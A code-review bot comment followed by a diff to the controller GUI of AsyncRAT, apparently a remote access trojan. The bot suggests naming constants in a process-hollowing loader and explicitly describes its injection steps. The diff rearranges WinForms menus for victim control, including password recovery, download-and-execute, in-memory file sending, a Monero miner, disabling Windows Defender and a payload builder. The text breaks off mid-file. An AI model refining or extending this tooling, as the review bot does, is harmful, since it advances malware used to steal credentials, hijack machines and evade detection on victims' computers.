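Review bot: The rewritten `Run` replaces the old arithmetic-obfuscated constants with bare hex literals but still leaves them unnamed: `0x00000004 | 0x08000000` in the `CreateProcessA` call, `0x3000, 0x40` in `VirtualAllocEx`, and `0x10002` for `context[0x0]`. Naming them, e.g. `const uint CreateSuspended = 0x00000004, CreateNoWindow = 0x08000000;` and `const int MemCommitReserve = 0x3000, PageExecuteReadWrite = 0x40;`, lets the loop be read without a Win32 header open. With names in place the loop reads as what it is: a process created suspended, a section unmap, a remote read-write-execute allocation, a thread-context write and a resume. That is the process-hollowing pattern that behavioural detection looks for, whatever the import table shows. The PE header offsets (`0x3C`, `0x34`, `0x50`, `0x54`, `0xF8`, `0x28`) would benefit from the same treatment.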
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj b/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj
index bb691b5..5caedaa 100644
--- a/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj
@@ -45,7 +45,6 @@
-
diff --git a/AsyncRAT-C#/Server/Forms/Form1.Designer.cs b/AsyncRAT-C#/Server/Forms/Form1.Designer.cs
index d11a853..58958d0 100644
--- a/AsyncRAT-C#/Server/Forms/Form1.Designer.cs
+++ b/AsyncRAT-C#/Server/Forms/Form1.Designer.cs
@@ -41,10 +41,45 @@
this.lv_admin = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_av = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_ping = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
- this.lv_prefor = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.lv_act = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.contextMenuClient = new System.Windows.Forms.ContextMenuStrip(this.components);
- this.aBOUTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator2 = new System.Windows.Forms.ToolStripSeparator();
+ this.toolStripSeparator1 = new System.Windows.Forms.ToolStripSeparator();
+ this.toolStripSeparator5 = new System.Windows.Forms.ToolStripSeparator();
+ this.statusStrip1 = new System.Windows.Forms.StatusStrip();
+ this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel();
+ this.toolStripStatusLabel2 = new System.Windows.Forms.ToolStripStatusLabel();
+ this.ping = new System.Windows.Forms.Timer(this.components);
+ this.UpdateUI = new System.Windows.Forms.Timer(this.components);
+ this.tabControl1 = new System.Windows.Forms.TabControl();
+ this.tabPage1 = new System.Windows.Forms.TabPage();
+ this.tabPage2 = new System.Windows.Forms.TabPage();
+ this.listView2 = new System.Windows.Forms.ListView();
+ this.columnHeader1 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.columnHeader2 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.contextMenuLogs = new System.Windows.Forms.ContextMenuStrip(this.components);
+ this.cLEARToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.tabPage3 = new System.Windows.Forms.TabPage();
+ this.listView3 = new System.Windows.Forms.ListView();
+ this.contextMenuThumbnail = new System.Windows.Forms.ContextMenuStrip(this.components);
+ this.ThumbnailImageList = new System.Windows.Forms.ImageList(this.components);
+ this.tabPage4 = new System.Windows.Forms.TabPage();
+ this.listView4 = new System.Windows.Forms.ListView();
+ this.columnHeader4 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.columnHeader5 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.contextMenuTasks = new System.Windows.Forms.ContextMenuStrip(this.components);
+ this.pASSWORDRECOVERYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.downloadAndExecuteToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.sENDFILETOMEMORYToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
+ this.minerToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
+ this.uPDATEToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
+ this.toolStripSeparator4 = new System.Windows.Forms.ToolStripSeparator();
+ this.dELETETASKToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.performanceCounter1 = new System.Diagnostics.PerformanceCounter();
+ this.performanceCounter2 = new System.Diagnostics.PerformanceCounter();
+ this.notifyIcon1 = new System.Windows.Forms.NotifyIcon(this.components);
+ this.TimerTask = new System.Windows.Forms.Timer(this.components);
+ this.aBOUTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.sENDFILEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.tOMEMORYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.tODISKToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
@@ -77,6 +112,7 @@
this.runToolStripMenuItem2 = new System.Windows.Forms.ToolStripMenuItem();
this.stopToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.disableWindowsDefenderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.setWallpaperToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.systemToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.clientToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.closeToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
@@ -89,46 +125,11 @@
this.logoffToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.restartToolStripMenuItem3 = new System.Windows.Forms.ToolStripMenuItem();
this.shutdownToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
- this.toolStripSeparator1 = new System.Windows.Forms.ToolStripSeparator();
this.serverToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.blockClientsToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
- this.toolStripSeparator5 = new System.Windows.Forms.ToolStripSeparator();
this.bUILDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
- this.statusStrip1 = new System.Windows.Forms.StatusStrip();
- this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel();
- this.toolStripStatusLabel2 = new System.Windows.Forms.ToolStripStatusLabel();
- this.ping = new System.Windows.Forms.Timer(this.components);
- this.UpdateUI = new System.Windows.Forms.Timer(this.components);
- this.tabControl1 = new System.Windows.Forms.TabControl();
- this.tabPage1 = new System.Windows.Forms.TabPage();
- this.tabPage2 = new System.Windows.Forms.TabPage();
- this.listView2 = new System.Windows.Forms.ListView();
- this.columnHeader1 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
- this.columnHeader2 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
- this.contextMenuLogs = new System.Windows.Forms.ContextMenuStrip(this.components);
- this.cLEARToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
- this.tabPage3 = new System.Windows.Forms.TabPage();
- this.listView3 = new System.Windows.Forms.ListView();
- this.contextMenuThumbnail = new System.Windows.Forms.ContextMenuStrip(this.components);
this.sTARTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.sTOPToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
- this.ThumbnailImageList = new System.Windows.Forms.ImageList(this.components);
- this.tabPage4 = new System.Windows.Forms.TabPage();
- this.listView4 = new System.Windows.Forms.ListView();
- this.columnHeader4 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
- this.columnHeader5 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
- this.contextMenuTasks = new System.Windows.Forms.ContextMenuStrip(this.components);
- this.pASSWORDRECOVERYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
- this.downloadAndExecuteToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
- this.sENDFILETOMEMORYToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
- this.minerToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
- this.uPDATEToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
- this.toolStripSeparator4 = new System.Windows.Forms.ToolStripSeparator();
- this.dELETETASKToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
- this.performanceCounter1 = new System.Diagnostics.PerformanceCounter();
- this.performanceCounter2 = new System.Diagnostics.PerformanceCounter();
- this.notifyIcon1 = new System.Windows.Forms.NotifyIcon(this.components);
- this.TimerTask = new System.Windows.Forms.Timer(this.components);
this.contextMenuClient.SuspendLayout();
this.statusStrip1.SuspendLayout();
this.tabControl1.SuspendLayout();
@@ -157,7 +158,7 @@
this.lv_admin,
this.lv_av,
this.lv_ping,
- this.lv_prefor});
+ this.lv_act});
this.listView1.ContextMenuStrip = this.contextMenuClient;
this.listView1.Dock = System.Windows.Forms.DockStyle.Fill;
this.listView1.FullRowSelect = true;
@@ -224,10 +225,10 @@
//
this.lv_ping.Text = "Ping";
//
- // lv_prefor
+ // lv_act
//
- this.lv_prefor.Text = "Miner";
- this.lv_prefor.Width = 200;
+ this.lv_act.Text = "Active Window";
+ this.lv_act.Width = 350;
//
// contextMenuClient
//
@@ -247,6 +248,302 @@
this.contextMenuClient.Name = "contextMenuStrip1";
this.contextMenuClient.Size = new System.Drawing.Size(203, 278);
//
+ // toolStripSeparator2
+ //
+ this.toolStripSeparator2.Name = "toolStripSeparator2";
+ this.toolStripSeparator2.Size = new System.Drawing.Size(199, 6);
+ //
+ // toolStripSeparator1
+ //
+ this.toolStripSeparator1.Name = "toolStripSeparator1";
+ this.toolStripSeparator1.Size = new System.Drawing.Size(199, 6);
+ //
+ // toolStripSeparator5
+ //
+ this.toolStripSeparator5.Name = "toolStripSeparator5";
+ this.toolStripSeparator5.Size = new System.Drawing.Size(199, 6);
+ //
+ // statusStrip1
+ //
+ this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24);
+ this.statusStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.toolStripStatusLabel1,
+ this.toolStripStatusLabel2});
+ this.statusStrip1.Location = new System.Drawing.Point(0, 479);
+ this.statusStrip1.Name = "statusStrip1";
+ this.statusStrip1.Size = new System.Drawing.Size(1301, 32);
+ this.statusStrip1.TabIndex = 1;
+ this.statusStrip1.Text = "statusStrip1";
+ //
+ // toolStripStatusLabel1
+ //
+ this.toolStripStatusLabel1.Name = "toolStripStatusLabel1";
+ this.toolStripStatusLabel1.Size = new System.Drawing.Size(24, 25);
+ this.toolStripStatusLabel1.Text = "...";
+ //
+ // toolStripStatusLabel2
+ //
+ this.toolStripStatusLabel2.Name = "toolStripStatusLabel2";
+ this.toolStripStatusLabel2.Size = new System.Drawing.Size(204, 25);
+ this.toolStripStatusLabel2.Text = " Notification";
+ this.toolStripStatusLabel2.Click += new System.EventHandler(this.ToolStripStatusLabel2_Click);
+ //
+ // ping
+ //
+ this.ping.Enabled = true;
+ this.ping.Interval = 30000;
+ this.ping.Tick += new System.EventHandler(this.ping_Tick);
+ //
+ // UpdateUI
+ //
+ this.UpdateUI.Enabled = true;
+ this.UpdateUI.Interval = 500;
+ this.UpdateUI.Tick += new System.EventHandler(this.UpdateUI_Tick);
+ //
+ // tabControl1
+ //
+ this.tabControl1.Controls.Add(this.tabPage1);
+ this.tabControl1.Controls.Add(this.tabPage2);
+ this.tabControl1.Controls.Add(this.tabPage3);
+ this.tabControl1.Controls.Add(this.tabPage4);
+ this.tabControl1.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.tabControl1.Location = new System.Drawing.Point(0, 0);
+ this.tabControl1.Name = "tabControl1";
+ this.tabControl1.SelectedIndex = 0;
+ this.tabControl1.Size = new System.Drawing.Size(1301, 479);
+ this.tabControl1.SizeMode = System.Windows.Forms.TabSizeMode.Fixed;
+ this.tabControl1.TabIndex = 2;
+ //
+ // tabPage1
+ //
+ this.tabPage1.Controls.Add(this.listView1);
+ this.tabPage1.Location = new System.Drawing.Point(4, 29);
+ this.tabPage1.Name = "tabPage1";
+ this.tabPage1.Padding = new System.Windows.Forms.Padding(3);
+ this.tabPage1.Size = new System.Drawing.Size(1293, 446);
+ this.tabPage1.TabIndex = 0;
+ this.tabPage1.Text = "Clients";
+ //
+ // tabPage2
+ //
+ this.tabPage2.Controls.Add(this.listView2);
+ this.tabPage2.Location = new System.Drawing.Point(4, 29);
+ this.tabPage2.Name = "tabPage2";
+ this.tabPage2.Padding = new System.Windows.Forms.Padding(3);
+ this.tabPage2.Size = new System.Drawing.Size(1293, 446);
+ this.tabPage2.TabIndex = 1;
+ this.tabPage2.Text = "Logs";
+ this.tabPage2.UseVisualStyleBackColor = true;
+ //
+ // listView2
+ //
+ this.listView2.BorderStyle = System.Windows.Forms.BorderStyle.None;
+ this.listView2.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
+ this.columnHeader1,
+ this.columnHeader2});
+ this.listView2.ContextMenuStrip = this.contextMenuLogs;
+ this.listView2.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.listView2.FullRowSelect = true;
+ this.listView2.GridLines = true;
+ this.listView2.HideSelection = false;
+ this.listView2.Location = new System.Drawing.Point(3, 3);
+ this.listView2.Name = "listView2";
+ this.listView2.ShowGroups = false;
+ this.listView2.ShowItemToolTips = true;
+ this.listView2.Size = new System.Drawing.Size(1287, 440);
+ this.listView2.TabIndex = 1;
+ this.listView2.UseCompatibleStateImageBehavior = false;
+ this.listView2.View = System.Windows.Forms.View.Details;
+ //
+ // columnHeader1
+ //
+ this.columnHeader1.Text = "Time";
+ this.columnHeader1.Width = 150;
+ //
+ // columnHeader2
+ //
+ this.columnHeader2.Text = "Message";
+ this.columnHeader2.Width = 705;
+ //
+ // contextMenuLogs
+ //
+ this.contextMenuLogs.ImageScalingSize = new System.Drawing.Size(24, 24);
+ this.contextMenuLogs.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.cLEARToolStripMenuItem});
+ this.contextMenuLogs.Name = "contextMenuLogs";
+ this.contextMenuLogs.ShowImageMargin = false;
+ this.contextMenuLogs.Size = new System.Drawing.Size(111, 36);
+ //
+ // cLEARToolStripMenuItem
+ //
+ this.cLEARToolStripMenuItem.Name = "cLEARToolStripMenuItem";
+ this.cLEARToolStripMenuItem.Size = new System.Drawing.Size(110, 32);
+ this.cLEARToolStripMenuItem.Text = "CLEAR";
+ this.cLEARToolStripMenuItem.Click += new System.EventHandler(this.CLEARToolStripMenuItem_Click);
+ //
+ // tabPage3
+ //
+ this.tabPage3.Controls.Add(this.listView3);
+ this.tabPage3.Location = new System.Drawing.Point(4, 29);
+ this.tabPage3.Name = "tabPage3";
+ this.tabPage3.Size = new System.Drawing.Size(1293, 446);
+ this.tabPage3.TabIndex = 2;
+ this.tabPage3.Text = "Thumbnail";
+ this.tabPage3.UseVisualStyleBackColor = true;
+ //
+ // listView3
+ //
+ this.listView3.ContextMenuStrip = this.contextMenuThumbnail;
+ this.listView3.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.listView3.HideSelection = false;
+ this.listView3.LargeImageList = this.ThumbnailImageList;
+ this.listView3.Location = new System.Drawing.Point(0, 0);
+ this.listView3.Name = "listView3";
+ this.listView3.ShowItemToolTips = true;
+ this.listView3.Size = new System.Drawing.Size(1293, 446);
+ this.listView3.SmallImageList = this.ThumbnailImageList;
+ this.listView3.TabIndex = 0;
+ this.listView3.UseCompatibleStateImageBehavior = false;
+ //
+ // contextMenuThumbnail
+ //
+ this.contextMenuThumbnail.ImageScalingSize = new System.Drawing.Size(24, 24);
+ this.contextMenuThumbnail.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.sTARTToolStripMenuItem,
+ this.sTOPToolStripMenuItem});
+ this.contextMenuThumbnail.Name = "contextMenuStrip2";
+ this.contextMenuThumbnail.Size = new System.Drawing.Size(144, 68);
+ //
+ // ThumbnailImageList
+ //
+ this.ThumbnailImageList.ColorDepth = System.Windows.Forms.ColorDepth.Depth16Bit;
+ this.ThumbnailImageList.ImageSize = new System.Drawing.Size(256, 256);
+ this.ThumbnailImageList.TransparentColor = System.Drawing.Color.Transparent;
+ //
+ // tabPage4
+ //
+ this.tabPage4.Controls.Add(this.listView4);
+ this.tabPage4.Location = new System.Drawing.Point(4, 29);
+ this.tabPage4.Name = "tabPage4";
+ this.tabPage4.Padding = new System.Windows.Forms.Padding(3);
+ this.tabPage4.Size = new System.Drawing.Size(1293, 446);
+ this.tabPage4.TabIndex = 3;
+ this.tabPage4.Text = "Tasks";
+ this.tabPage4.UseVisualStyleBackColor = true;
+ //
+ // listView4
+ //
+ this.listView4.BorderStyle = System.Windows.Forms.BorderStyle.None;
+ this.listView4.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
+ this.columnHeader4,
+ this.columnHeader5});
+ this.listView4.ContextMenuStrip = this.contextMenuTasks;
+ this.listView4.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.listView4.FullRowSelect = true;
+ this.listView4.HideSelection = false;
+ this.listView4.Location = new System.Drawing.Point(3, 3);
+ this.listView4.Name = "listView4";
+ this.listView4.Size = new System.Drawing.Size(1287, 440);
+ this.listView4.TabIndex = 0;
+ this.listView4.UseCompatibleStateImageBehavior = false;
+ this.listView4.View = System.Windows.Forms.View.Details;
+ //
+ // columnHeader4
+ //
+ this.columnHeader4.Text = "Task";
+ this.columnHeader4.Width = 97;
+ //
+ // columnHeader5
+ //
+ this.columnHeader5.Text = "Execution";
+ this.columnHeader5.Width = 116;
+ //
+ // contextMenuTasks
+ //
+ this.contextMenuTasks.ImageScalingSize = new System.Drawing.Size(24, 24);
+ this.contextMenuTasks.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.pASSWORDRECOVERYToolStripMenuItem,
+ this.downloadAndExecuteToolStripMenuItem,
+ this.sENDFILETOMEMORYToolStripMenuItem1,
+ this.minerToolStripMenuItem1,
+ this.uPDATEToolStripMenuItem1,
+ this.toolStripSeparator4,
+ this.dELETETASKToolStripMenuItem});
+ this.contextMenuTasks.Name = "contextMenuStrip4";
+ this.contextMenuTasks.ShowImageMargin = false;
+ this.contextMenuTasks.Size = new System.Drawing.Size(250, 202);
+ //
+ // pASSWORDRECOVERYToolStripMenuItem
+ //
+ this.pASSWORDRECOVERYToolStripMenuItem.Name = "pASSWORDRECOVERYToolStripMenuItem";
+ this.pASSWORDRECOVERYToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
+ this.pASSWORDRECOVERYToolStripMenuItem.Text = "PASSWORD RECOVERY";
+ this.pASSWORDRECOVERYToolStripMenuItem.Click += new System.EventHandler(this.PASSWORDRECOVERYToolStripMenuItem_Click);
+ //
+ // downloadAndExecuteToolStripMenuItem
+ //
+ this.downloadAndExecuteToolStripMenuItem.Name = "downloadAndExecuteToolStripMenuItem";
+ this.downloadAndExecuteToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
+ this.downloadAndExecuteToolStripMenuItem.Text = "SEND FILE TO DISK";
+ this.downloadAndExecuteToolStripMenuItem.Click += new System.EventHandler(this.DownloadAndExecuteToolStripMenuItem_Click);
+ //
+ // sENDFILETOMEMORYToolStripMenuItem1
+ //
+ this.sENDFILETOMEMORYToolStripMenuItem1.Name = "sENDFILETOMEMORYToolStripMenuItem1";
+ this.sENDFILETOMEMORYToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
+ this.sENDFILETOMEMORYToolStripMenuItem1.Text = "SEND FILE TO MEMORY";
+ this.sENDFILETOMEMORYToolStripMenuItem1.Click += new System.EventHandler(this.SENDFILETOMEMORYToolStripMenuItem1_Click);
+ //
+ // minerToolStripMenuItem1
+ //
+ this.minerToolStripMenuItem1.Name = "minerToolStripMenuItem1";
+ this.minerToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
+ this.minerToolStripMenuItem1.Text = "XMR MINER";
+ this.minerToolStripMenuItem1.Visible = false;
+ this.minerToolStripMenuItem1.Click += new System.EventHandler(this.MinerToolStripMenuItem1_Click);
+ //
+ // uPDATEToolStripMenuItem1
+ //
+ this.uPDATEToolStripMenuItem1.Name = "uPDATEToolStripMenuItem1";
+ this.uPDATEToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
+ this.uPDATEToolStripMenuItem1.Text = "UPDATE ALL CLIENTS";
+ this.uPDATEToolStripMenuItem1.Click += new System.EventHandler(this.UPDATEToolStripMenuItem1_Click);
+ //
+ // toolStripSeparator4
+ //
+ this.toolStripSeparator4.Name = "toolStripSeparator4";
+ this.toolStripSeparator4.Size = new System.Drawing.Size(246, 6);
+ //
+ // dELETETASKToolStripMenuItem
+ //
+ this.dELETETASKToolStripMenuItem.Name = "dELETETASKToolStripMenuItem";
+ this.dELETETASKToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
+ this.dELETETASKToolStripMenuItem.Text = "DELETE TASK";
+ this.dELETETASKToolStripMenuItem.Click += new System.EventHandler(this.DELETETASKToolStripMenuItem_Click);
+ //
+ // performanceCounter1
+ //
+ this.performanceCounter1.CategoryName = "Processor";
+ this.performanceCounter1.CounterName = "% Processor Time";
+ this.performanceCounter1.InstanceName = "_Total";
+ //
+ // performanceCounter2
+ //
+ this.performanceCounter2.CategoryName = "Memory";
+ this.performanceCounter2.CounterName = "% Committed Bytes In Use";
+ //
+ // notifyIcon1
+ //
+ this.notifyIcon1.Icon = ((System.Drawing.Icon)(resources.GetObject("notifyIcon1.Icon")));
+ this.notifyIcon1.Text = "AsyncRAT";
+ this.notifyIcon1.Visible = true;
+ //
+ // TimerTask
+ //
+ this.TimerTask.Enabled = true;
+ this.TimerTask.Interval = 5000;
+ this.TimerTask.Tick += new System.EventHandler(this.TimerTask_Tick);
+ //
// aBOUTToolStripMenuItem
//
this.aBOUTToolStripMenuItem.Image = global::Server.Properties.Resources.info;
@@ -255,11 +552,6 @@
this.aBOUTToolStripMenuItem.Text = "ABOUT";
this.aBOUTToolStripMenuItem.Click += new System.EventHandler(this.ABOUTToolStripMenuItem_Click);
//
- // toolStripSeparator2
- //
- this.toolStripSeparator2.Name = "toolStripSeparator2";
- this.toolStripSeparator2.Size = new System.Drawing.Size(199, 6);
- //
// sENDFILEToolStripMenuItem
//
this.sENDFILEToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
@@ -445,6 +737,7 @@
this.xMRMinerToolStripMenuItem.Name = "xMRMinerToolStripMenuItem";
this.xMRMinerToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.xMRMinerToolStripMenuItem.Text = "XMR Miner";
+ this.xMRMinerToolStripMenuItem.Visible = false;
//
// runToolStripMenuItem
//
@@ -470,7 +763,8 @@
this.chatToolStripMenuItem1,
this.getAdminPrivilegesToolStripMenuItem,
this.blankScreenToolStripMenuItem,
- this.disableWindowsDefenderToolStripMenuItem});
+ this.disableWindowsDefenderToolStripMenuItem,
+ this.setWallpaperToolStripMenuItem});
this.extraToolStripMenuItem.Image = global::Server.Properties.Resources.extra;
this.extraToolStripMenuItem.Name = "extraToolStripMenuItem";
this.extraToolStripMenuItem.Size = new System.Drawing.Size(202, 32);
@@ -542,6 +836,14 @@
this.disableWindowsDefenderToolStripMenuItem.Text = "Disable Windows Defender";
this.disableWindowsDefenderToolStripMenuItem.Click += new System.EventHandler(this.DisableWindowsDefenderToolStripMenuItem_Click_1);
//
+ // setWallpaperToolStripMenuItem
+ //
+ this.setWallpaperToolStripMenuItem.Image = global::Server.Properties.Resources.iconfinder_32_171485__1_;
+ this.setWallpaperToolStripMenuItem.Name = "setWallpaperToolStripMenuItem";
+ this.setWallpaperToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
+ this.setWallpaperToolStripMenuItem.Text = "Set Wallpaper";
+ this.setWallpaperToolStripMenuItem.Click += new System.EventHandler(this.setWallpaperToolStripMenuItem_Click);
+ //
// systemToolStripMenuItem
//
this.systemToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
@@ -638,11 +940,6 @@
this.shutdownToolStripMenuItem1.Text = "Shutdown";
this.shutdownToolStripMenuItem1.Click += new System.EventHandler(this.ShutdownToolStripMenuItem1_Click);
//
- // toolStripSeparator1
- //
- this.toolStripSeparator1.Name = "toolStripSeparator1";
- this.toolStripSeparator1.Size = new System.Drawing.Size(199, 6);
- //
// serverToolStripMenuItem
//
this.serverToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
@@ -660,11 +957,6 @@
this.blockClientsToolStripMenuItem.Text = "Block Clients";
this.blockClientsToolStripMenuItem.Click += new System.EventHandler(this.BlockClientsToolStripMenuItem_Click);
//
- // toolStripSeparator5
- //
- this.toolStripSeparator5.Name = "toolStripSeparator5";
- this.toolStripSeparator5.Size = new System.Drawing.Size(199, 6);
- //
// bUILDERToolStripMenuItem
//
this.bUILDERToolStripMenuItem.Image = global::Server.Properties.Resources.builder;
@@ -673,157 +965,6 @@
this.bUILDERToolStripMenuItem.Text = "BUILDER";
this.bUILDERToolStripMenuItem.Click += new System.EventHandler(this.bUILDERToolStripMenuItem_Click);
//
- // statusStrip1
- //
- this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24);
- this.statusStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
- this.toolStripStatusLabel1,
- this.toolStripStatusLabel2});
- this.statusStrip1.Location = new System.Drawing.Point(0, 479);
- this.statusStrip1.Name = "statusStrip1";
- this.statusStrip1.Size = new System.Drawing.Size(1301, 32);
- this.statusStrip1.TabIndex = 1;
- this.statusStrip1.Text = "statusStrip1";
- //
- // toolStripStatusLabel1
- //
- this.toolStripStatusLabel1.Name = "toolStripStatusLabel1";
- this.toolStripStatusLabel1.Size = new System.Drawing.Size(24, 25);
- this.toolStripStatusLabel1.Text = "...";
- //
- // toolStripStatusLabel2
- //
- this.toolStripStatusLabel2.Name = "toolStripStatusLabel2";
- this.toolStripStatusLabel2.Size = new System.Drawing.Size(204, 25);
- this.toolStripStatusLabel2.Text = " Notification";
- this.toolStripStatusLabel2.Click += new System.EventHandler(this.ToolStripStatusLabel2_Click);
- //
- // ping
- //
- this.ping.Enabled = true;
- this.ping.Interval = 30000;
- this.ping.Tick += new System.EventHandler(this.ping_Tick);
- //
- // UpdateUI
- //
- this.UpdateUI.Enabled = true;
- this.UpdateUI.Interval = 500;
- this.UpdateUI.Tick += new System.EventHandler(this.UpdateUI_Tick);
- //
- // tabControl1
- //
- this.tabControl1.Controls.Add(this.tabPage1);
- this.tabControl1.Controls.Add(this.tabPage2);
- this.tabControl1.Controls.Add(this.tabPage3);
- this.tabControl1.Controls.Add(this.tabPage4);
- this.tabControl1.Dock = System.Windows.Forms.DockStyle.Fill;
- this.tabControl1.Location = new System.Drawing.Point(0, 0);
- this.tabControl1.Name = "tabControl1";
- this.tabControl1.SelectedIndex = 0;
- this.tabControl1.Size = new System.Drawing.Size(1301, 479);
- this.tabControl1.SizeMode = System.Windows.Forms.TabSizeMode.Fixed;
- this.tabControl1.TabIndex = 2;
- //
- // tabPage1
- //
- this.tabPage1.Controls.Add(this.listView1);
- this.tabPage1.Location = new System.Drawing.Point(4, 29);
- this.tabPage1.Name = "tabPage1";
- this.tabPage1.Padding = new System.Windows.Forms.Padding(3);
- this.tabPage1.Size = new System.Drawing.Size(1293, 446);
- this.tabPage1.TabIndex = 0;
- this.tabPage1.Text = "Clients";
- //
- // tabPage2
- //
- this.tabPage2.Controls.Add(this.listView2);
- this.tabPage2.Location = new System.Drawing.Point(4, 29);
- this.tabPage2.Name = "tabPage2";
- this.tabPage2.Padding = new System.Windows.Forms.Padding(3);
- this.tabPage2.Size = new System.Drawing.Size(1293, 446);
- this.tabPage2.TabIndex = 1;
- this.tabPage2.Text = "Logs";
- this.tabPage2.UseVisualStyleBackColor = true;
- //
- // listView2
- //
- this.listView2.BorderStyle = System.Windows.Forms.BorderStyle.None;
- this.listView2.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
- this.columnHeader1,
- this.columnHeader2});
- this.listView2.ContextMenuStrip = this.contextMenuLogs;
- this.listView2.Dock = System.Windows.Forms.DockStyle.Fill;
- this.listView2.FullRowSelect = true;
- this.listView2.GridLines = true;
- this.listView2.HideSelection = false;
- this.listView2.Location = new System.Drawing.Point(3, 3);
- this.listView2.Name = "listView2";
- this.listView2.ShowGroups = false;
- this.listView2.ShowItemToolTips = true;
- this.listView2.Size = new System.Drawing.Size(1287, 440);
- this.listView2.TabIndex = 1;
- this.listView2.UseCompatibleStateImageBehavior = false;
- this.listView2.View = System.Windows.Forms.View.Details;
- //
- // columnHeader1
- //
- this.columnHeader1.Text = "Time";
- this.columnHeader1.Width = 150;
- //
- // columnHeader2
- //
- this.columnHeader2.Text = "Message";
- this.columnHeader2.Width = 705;
- //
- // contextMenuLogs
- //
- this.contextMenuLogs.ImageScalingSize = new System.Drawing.Size(24, 24);
- this.contextMenuLogs.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
- this.cLEARToolStripMenuItem});
- this.contextMenuLogs.Name = "contextMenuLogs";
- this.contextMenuLogs.ShowImageMargin = false;
- this.contextMenuLogs.Size = new System.Drawing.Size(111, 36);
- //
- // cLEARToolStripMenuItem
- //
- this.cLEARToolStripMenuItem.Name = "cLEARToolStripMenuItem";
- this.cLEARToolStripMenuItem.Size = new System.Drawing.Size(110, 32);
- this.cLEARToolStripMenuItem.Text = "CLEAR";
